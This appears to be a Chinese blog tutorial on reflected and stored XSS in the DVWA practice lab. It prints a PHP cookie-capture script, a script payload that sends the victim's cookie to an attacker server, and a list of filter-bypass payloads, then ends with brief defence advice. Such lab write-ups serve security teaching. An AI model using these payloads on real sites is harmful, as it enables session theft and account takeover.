【渗透测试-web安全】DVWA-XSS

最新推荐文章于 2022-03-16 10:48:24 发布
最新推荐文章于 2022-03-16 10:48:24 发布
阅读量479 收藏
点赞数
分类专栏: 网络安全 文章标签: 安全 渗透 web安全 DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harry_c/article/details/103699965
版权

【渗透测试-web安全】DVWA-XSS

登录

登录DVWA后设置好对应的等级点击打开XSS

测试

测试XSS注入
	~~~php
	<script>alert('显示则表明存在XSS注入')</script>
	~~~

在这里插入图片描述
在这里插入图片描述

	如上图我们能够确定的确是存在XSS注入的

在这里插入图片描述
注:在XSS注入的过程中我们使用的弹窗函数有:
alert(“弹出警告窗口”)
confirm(“弹出确认窗口”)
prompt(“弹出输入参数确认窗口”)
验证XSS漏洞之后我们进行攻击过程复现
攻击过程:
首先我们在本地服务器创建一个cookie.php脚本用来恶意获取用户的cookie地址

<?
$cookie = $_GET["cookie"];
file_put_contents('cookie.txt',$cookie);
?>

	然后构造攻击的js脚本:

	<?
	<script>
	document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;
	</script>
	?>
	~~~
构造攻击的URL~~~url
http://localhost/dvwa/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

编码成对应的url

			http://localhost/dvwa/vulnerabilities/xss_r/?name=%3cscript%3edocument.location=%27http://127.0.0.1/cookie.php?cookie=%27+document.cookie;%3c/script%3e

	访问之后我们的服务器根文件目录新建了一个cookie.txt文件

在这里插入图片描述
打开文件cookie.txt文件查看文件内容发现: 在这里插入图片描述
存储的正是我们网站访问的cookie信息,窃取到cookie之后,
攻击者可以进一步利用对应的cookie信息进行其他违法操作,使得受害者遭受损失。
存储型的XSS同样操作,只是对应的攻击XSS内容存储在数据库中,每次访问都会复现构造的XSS攻击
因此,存储型的XSS能够及时更新我们本地的cookie信息,从而使得危害更大。

进阶

XSS攻击进阶:
在LOW中,系统没有对用户输入的数据进行任何形式的过滤,所以比较容易攻击
下面就过滤的情况进行对应的方法破解:

修改方法

破解方法

解释

进行script一次过滤

<scr<script>ipt></script>

对标签<script>过滤之后剩下的内容有构成了新的完整的script标签

进行scpipt多次过滤

<ScripT></ScriPt>

对标签进行大小写混写的操作,从而无法进行过滤

script各种形式进行了过滤

<img src=x οnerrοr=alert("XSS")>

img标签加载错误的情况下会执行onerror上面的函数

imgscript过滤

<iframe οnlοad=alert("XSS")>

iframe框架标签也能够执行对应的函数

htmlspecialchars函数进编码过滤

默认不编码单引号

由攻击进阶我们能够知道对应的XSS攻击设置白名单或者黑名单的方式能够进行有效的防范,但是白名单的效果更佳。

XSS的防范中最重要的的进行输出的过滤:
输出HTML时我们进行对应的HTML编码
输出JS时我们进行对应的JS转义

Just_Do_Eat
关注
专栏目录
渗透测试--DVWA命令注入
qq_45070118的博客
07-30 1834
DVWA 命令注入:利用各种调用系统命令的web应用,通过命令拼接、绕过黑名单等方式实现在服务端实现想要实现的系统命令。 如何配置登陆看我的burpsuite爆破文章中就有 这次我分为linux和windows两个版本登录时分别把登陆网址的IP改为目标系统的IP即可 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应...
DVWA-master.zip
01-04
DVWA(Damn Vulnerable Web Application)是一个用于安全测试和教育目的的开源Web应用程序。它旨在帮助安全专业人员、开发人员和学生了解常见Web应用程序漏洞,并提供实践环境来检测和修复这些问题。DVWA-master.zip...
网站渗透测试报告
02-20
与系统没有对用户的操作做唯一标识,如果攻击者欺骗用户访问恶意构造的页面,此时攻击者就可以劫持用户的会话数据发出非故意的HTTP请求,如修改用户的口令等恶意操作
网站渗透测试
野生C猿的专栏
09-25 4587
目录[TOC] 公司的网站需要渗透测试,学习了一下渗透测试的方法,记录下,方便后期查阅。(1) 暴力破解1.1 风险分析:数据传输过程使用非加密的http协议,因此可对数据传输过程进行抓包分析;用户名、密码明文,且未设置验证码,导致可进行暴力破解,以获取身份凭证信息1.2 加固建议1:使用https 加密传输 可以在apache或者tomcat下配置好证书,启用https就ok,网上很多
安全|Dvwa渗透测试网站搭建
算法与编程之美
10-08 581
欢迎点击「算法与编程之美」↑关注我们!本文首发于微信公众号:"算法与编程之美",欢迎关注,及时了解更多此系列文章。Dvwa简介DVWA(Damn Vulnerable W...
DVWA-XSS(DOM)
weixin_44866139的博客
01-29 2802
XSS 简介 参考链接 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM—based XSS漏洞的产生 DOM—based XSS漏洞是基于文档对象模型...
DVWA-XSS(Reflected)
weixin_44866139的博客
01-31 649
Low 1、查看服务器端源代码 <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '&l...
渗透测试环境部署DVWA
最新发布
10-29
DVWA(Damn Vulnerable Web Application)是一款专门为渗透测试安全教育设计的开源Web应用程序。在这个环境中,我们可以模拟各种常见Web漏洞,如SQL注入、跨站脚本(XSS)、文件包含、命令注入等,以学习如何检测...
2020-10-18-kali搭建DVWA.md
01-24
DVWA(Damn Vulnerable Web Application)是一款被设计用于安全测试人员进行渗透测试实验的Web应用平台,它包含了多种常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击等。本文将详细介绍如何在Kali Linux操作...
渗透测试初学者资源 DVWA压缩包
12-23
渗透测试是网络安全领域中一项重要的技能,主要用于模拟黑客攻击,以评估系统安全防护能力。DVWA(Damn Vulnerable Web ...记住,安全测试不仅仅是找到漏洞,更重要的是理解它们的工作原理,以便有效地预防和修复。
DVWA学习日记-7 XSS
qq_29010757的博客
11-28 463
XSS漏洞 概述 收到一个链接,手一抖就点下去了,发现钱没了,有点类似CSRF,从受害者角度来说都是一样情况,但是从攻击者角度来说不同 XSS Cross-site scripting 跨站 脚本 本质上: 客户端代码注入,通常注入代码是JavaScript区别于命令注入,SQL注入等服务端代码注入 类型: 存储型XSS 攻击代码在数据库里在HTTP响应中 反射型XSS 攻击代码在url里输出...
DVWA渗透测试演示(上)
Fly_鹏程万里
02-28 3774
一、DVWA简介:DVWA(Dam Volnerable WebApplication)是用PHP+MYSQL编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等一些常见的安全漏洞二、渗透测试前的准备:(1)在本地搭建PHP+MySQL+Apache环境(可以使用PHPstudy来实现)(2)将下载好的dvwa解压缩到WWW目录下(此次渗透测试是采用PHP...
XSS跨站脚本攻击——在DVWA中的练习
D-R0s1的博客
02-10 3679
理论部分 简介         跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS攻击Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL...
web安全测试
learn112的博客
02-03 946
web安全测试 web安全测试是指: 检验web产品抵抗网络攻击能力的一个过程 web攻击两个特点:1.影响范围广;2.经济损失大 安全测试的三种方式 代码静态扫描 工具:Fortify,sonarqube等 内存扫描 可以使用杀毒软件 黑盒动态测试(也叫渗透测试) 模拟黑客对系统进行攻击 渗透测试三个阶段(过程) 收集信息 比如收集ip地址、操作系统、中间件、版本号、数据库类型等等 发现漏洞、验证漏洞 开始发起攻击 利用漏洞 渗透测试的两个特点 渗透测试是个逐渐渗透的过
渗透测试漏洞平台DVWA-参考答案
热门推荐
煜铭2011
10-03 1万+
0x00 前言 DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 0x01 下载安装XAMPP 1 下载地址:http://www.xampps.com/ 2 下载了压缩包:xampp_2016.zip,解压后点击xamp
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3660
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
渗透练习系列】DVWA靶机实战,通过XSS盗取cookie登录-02
书山上的云的博客
03-16 7709
一、发现XSS漏洞 1.1 登录DVWA,找到XSS(DOM)模块,测试XSS是否存在。 1.2 在选项的传参后面加入一串js代码,也就是可以XSS弹出的代码。payload如下: <script>alert(/xss/)</script> 发现可以弹窗,证明此处存在XSS。 二、盗取cookie 2.1 在XSS平台上搭建一个测试项目。这里用的是免费的XSS平台: https://xssaq.com/xss.php 选择【我的项目】->【创建】,创建一个测试项目: 2.2
DVWA下利用XSS获取Cookie
When you collect everything, you understand nothing.
09-06 3448
众所周知,利用XSS攻击,可以在用户登陆存在漏洞的站点之后,获取用户的Cookie值。有了Cookie,我们便可以在不知道用户名密码的情况下,模拟用户登陆站点。 本文记录一次在DVWA漏洞平台的XSS(Reflected)模块下,利用XSS获取该平台登陆Cookie的实验。 0x00实验准备 实验环境DVWA:Windows 7,存在XSS网站;|IP: 192.168.124.6| 主机...
渗透测试-web安全】基于DVWA的测试实战环境搭建
harry_c的博客
10-24 1029
渗透测试-web安全】基于DVWA的测试实战环境搭建本地搭建php环境DVWA的安装下载解压安装修改配置信息安装点击创建数据库进入登录页面账号密码DVWA测试内容介绍 除了DVWA外还有DSVW大家可以自行查找相关资料,后面有时间我也可能会写相关的教程 本地搭建php环境 这里我们利用最简单的集成环境phpstudy(我们也可以用tomcat或者其他的服务创建web环境)。 首选访问 phps...
DVWA入门实战:Web安全靶场深度解析与部署
这篇文章提供了一套系统的学习路径,适合那些想要在实际环境中提升Web安全意识和技能的渗透测试人员和开发者。通过DVWA的实践,读者可以建立起对网络安全漏洞的基础认知,为进一步的安全职业生涯打下坚实基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值